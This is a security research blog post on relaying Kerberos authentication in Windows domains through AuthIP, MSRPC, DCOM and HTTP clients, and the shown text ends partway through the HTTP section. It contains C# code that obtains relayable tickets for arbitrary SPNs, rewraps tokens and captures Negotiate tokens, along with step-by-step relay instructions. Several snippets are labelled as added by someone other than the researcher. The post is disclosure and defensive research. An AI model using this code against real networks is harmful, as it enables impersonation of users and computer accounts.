This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must perform the authentication automatically without user interaction, otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This, combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication, allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk.  The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand Kerberos has always required the target of the authentication to be specified beforehand through a principal name, typically this is a Service Principal Name (SPN) although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.
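
For illustration, a sketch of such a client is shown below. This is my own code, not from the research, with simplified P/Invoke declarations; it deliberately passes no request flags so the AP_REQ stays relayable, which matters for the caveats discussed next.

using System;
using System.Runtime.InteropServices;

static class KerberosClient
{
    [StructLayout(LayoutKind.Sequential)]
    struct SecHandle { public IntPtr Low; public IntPtr High; }

    [StructLayout(LayoutKind.Sequential)]
    struct SecBuffer
    {
        public int cbBuffer;
        public int BufferType; // 2 == SECBUFFER_TOKEN
        public IntPtr pvBuffer;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct SecBufferDesc
    {
        public int ulVersion; // 0 == SECBUFFER_VERSION
        public int cBuffers;
        public IntPtr pBuffers;
    }

    [DllImport("sspicli.dll", CharSet = CharSet.Unicode)]
    static extern int AcquireCredentialsHandleW(string pszPrincipal,
        string pszPackage, int fCredentialUse, IntPtr pvLogonID,
        IntPtr pAuthData, IntPtr pGetKeyFn, IntPtr pvGetKeyArgument,
        out SecHandle phCredential, out long ptsExpiry);

    [DllImport("sspicli.dll", CharSet = CharSet.Unicode)]
    static extern int InitializeSecurityContextW(ref SecHandle phCredential,
        IntPtr phContext, string pszTargetName, int fContextReq, int Reserved1,
        int TargetDataRep, IntPtr pInput, int Reserved2,
        out SecHandle phNewContext, ref SecBufferDesc pOutput,
        out int pfContextAttr, out long ptsExpiry);

    // Generate a Kerberos AP_REQ for an arbitrary SPN. No request flags
    // are passed, so the token doesn't ask for integrity or confidentiality.
    public static byte[] GetApReq(string spn)
    {
        AcquireCredentialsHandleW(null, "Kerberos",
            2 /* SECPKG_CRED_OUTBOUND */, IntPtr.Zero, IntPtr.Zero,
            IntPtr.Zero, IntPtr.Zero, out SecHandle cred, out _);
        var buf = new SecBuffer {
            cbBuffer = 0x10000,
            BufferType = 2,
            pvBuffer = Marshal.AllocHGlobal(0x10000)
        };
        IntPtr pBuf = Marshal.AllocHGlobal(Marshal.SizeOf(buf));
        Marshal.StructureToPtr(buf, pBuf, false);
        var desc = new SecBufferDesc { ulVersion = 0, cBuffers = 1, pBuffers = pBuf };
        int res = InitializeSecurityContextW(ref cred, IntPtr.Zero, spn,
            0, 0, 0x10 /* SECURITY_NATIVE_DREP */, IntPtr.Zero, 0,
            out SecHandle ctx, ref desc, out int attrs, out _);
        if (res < 0)
            throw new InvalidOperationException($"SSPI error 0x{res:X8}");
        buf = Marshal.PtrToStructure<SecBuffer>(pBuf);
        byte[] token = new byte[buf.cbBuffer];
        Marshal.Copy(buf.pvBuffer, token, 0, token.Length);
        return token;
    }
}

Calling KerberosClient.GetApReq("CIFS/fileserver.domain.com") as a domain user should return an AP_REQ for that SPN which can then be forwarded wherever the attacker likes.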

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is that Negotiate is by far the most likely package in use, as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from the client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic, the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections, it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.
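
To make the vulnerable client pattern concrete, here's a rough sketch of a client doing exactly this. The code is my own, not from the research; the numeric constants are the documented values and TCP port 12345 is a placeholder.

using System;
using System.Runtime.InteropServices;

static class RpcSpnClient
{
    [DllImport("rpcrt4.dll", CharSet = CharSet.Unicode)]
    static extern int RpcBindingFromStringBinding(string StringBinding,
        out IntPtr Binding);

    [DllImport("rpcrt4.dll", CharSet = CharSet.Unicode)]
    static extern int RpcMgmtInqServerPrincName(IntPtr Binding,
        uint AuthnSvc, out IntPtr ServerPrincName);

    [DllImport("rpcrt4.dll", CharSet = CharSet.Unicode)]
    static extern int RpcBindingSetAuthInfo(IntPtr Binding,
        string ServerPrincName, uint AuthnLevel, uint AuthnSvc,
        IntPtr AuthIdentity, uint AuthzSvc);

    // The vulnerable pattern: query the server for its SPN and use it
    // verbatim when configuring authentication on the binding.
    public static void ConnectWithServerSpn(string host)
    {
        RpcBindingFromStringBinding($"ncacn_ip_tcp:{host}[12345]",
            out IntPtr binding);
        // 16 == RPC_C_AUTHN_GSS_KERBEROS
        RpcMgmtInqServerPrincName(binding, 16, out IntPtr principal);
        string spn = Marshal.PtrToStringUni(principal);
        // 2 == RPC_C_AUTHN_LEVEL_CONNECT: no integrity on the AP_REQ.
        RpcBindingSetAuthInfo(binding, spn, 2, 16, IntPtr.Zero, 0);
    }
}

A malicious server can return any string it likes from RpcMgmtInqServerPrincName, and a client like this will request a Kerberos ticket for it verbatim.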

As an aside, curiously when a connection is made to the server it can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also, Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN, however they frame it in the context of mutual authentication and not protection against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname; it just concatenates strings, and for some reason it doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_REP and then receiving another AP_REP from the client. Until that third leg has been provided to the server it won't consider the authentication complete, so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have a GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this wrapper is not protected against modification, so the relay code can prepend the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)
{
    if (length < 0x80)
        return new byte[] { (byte)length };
    if (length < 0x100)
        return new byte[] { 0x81, (byte)length };
    if (length < 0x10000)
        return new byte[] { 0x82, (byte)(length >> 8),
                            (byte)(length & 0xFF) };
    throw new ArgumentException("Invalid length", nameof(length));
}

public static byte[] ConvertApReq(byte[] token)
{
    if (token.Length == 0 || token[0] != 0x6E)
        return token;
    MemoryStream stm = new MemoryStream();
    BinaryWriter writer = new BinaryWriter(stm);
    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");
    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,
        0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };
    writer.Write((byte)0x60);
    writer.Write(EncodeLength(header.Length + token.Length));
    writer.Write(header);
    writer.Write(token);
    return stm.ToArray();
}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity nor confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.
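
To illustrate the attacker's half of this exchange, the following is a minimal capture server sketch. It is my own code, not from the research; it only handles the single-leg Kerberos case, as NTLM's multi-leg exchange would need connection reuse.

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;

static class NegotiateCapture
{
    // Minimal HTTP server which demands Negotiate authentication and
    // prints the client's Base64 token. A real relay would decode the
    // token and forward it to the target service.
    public static void Run(int port)
    {
        var listener = new TcpListener(IPAddress.Any, port);
        listener.Start();
        while (true)
        {
            using (TcpClient client = listener.AcceptTcpClient())
            using (NetworkStream stream = client.GetStream())
            {
                var reader = new StreamReader(stream);
                var writer = new StreamWriter(stream) { AutoFlush = true };
                string token = null;
                string line;
                while (!string.IsNullOrEmpty(line = reader.ReadLine()))
                {
                    const string prefix = "Authorization: Negotiate ";
                    if (line.StartsWith(prefix))
                        token = line.Substring(prefix.Length);
                }
                if (token == null)
                {
                    // Ask the client to authenticate.
                    writer.Write("HTTP/1.1 401 Unauthorized\r\n" +
                        "WWW-Authenticate: Negotiate\r\n" +
                        "Content-Length: 0\r\nConnection: close\r\n\r\n");
                }
                else
                {
                    Console.WriteLine($"Captured token: {token}");
                    writer.Write("HTTP/1.1 200 OK\r\n" +
                        "Content-Length: 0\r\nConnection: close\r\n\r\n");
                }
            }
        }
    }
}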

In theory only NTLM and Negotiate are defined but an HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There are two important behaviors that I wanted to assess with HTTP. The first is how the user agent determines when to perform automatic Windows authentication using the current user's credentials; in order to relay the authentication it can't ask the user for their credentials. The second is how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine it with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. The post is over 10 years old so it was possible that things had changed, however it turns out they haven't.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.
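
You can observe this behavior directly. The following sketch, which is my own code rather than anything from WinINET, performs the same style of lookup and returns the canonical name for a host:

using System;
using System.Net.Sockets;
using System.Runtime.InteropServices;

static class CanonicalName
{
    [StructLayout(LayoutKind.Sequential)]
    struct ADDRINFOW
    {
        public int ai_flags;
        public int ai_family;
        public int ai_socktype;
        public int ai_protocol;
        public IntPtr ai_addrlen;   // size_t
        public IntPtr ai_canonname; // PWSTR
        public IntPtr ai_addr;
        public IntPtr ai_next;
    }

    [DllImport("ws2_32.dll", CharSet = CharSet.Unicode)]
    static extern int GetAddrInfoW(string pNodeName, string pServiceName,
        ref ADDRINFOW pHints, out IntPtr ppResult);

    [DllImport("ws2_32.dll")]
    static extern void FreeAddrInfoW(IntPtr pAddrInfo);

    // Resolve a host the way WinINET does when building the SPN: request
    // the canonical name and read ai_canonname from the first result.
    public static string GetCanonicalName(string host)
    {
        // Creating a socket ensures Winsock has been initialized.
        using (new Socket(AddressFamily.InterNetwork, SocketType.Dgram,
                          ProtocolType.Udp)) { }
        var hints = new ADDRINFOW { ai_flags = 0x2 /* AI_CANONNAME */ };
        int res = GetAddrInfoW(host, null, ref hints, out IntPtr result);
        if (res != 0)
            throw new InvalidOperationException($"getaddrinfo error {res}");
        try
        {
            var info = Marshal.PtrToStructure<ADDRINFOW>(result);
            return Marshal.PtrToStringUni(info.ai_canonname);
        }
        finally
        {
            FreeAddrInfoW(result);
        }
    }
}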

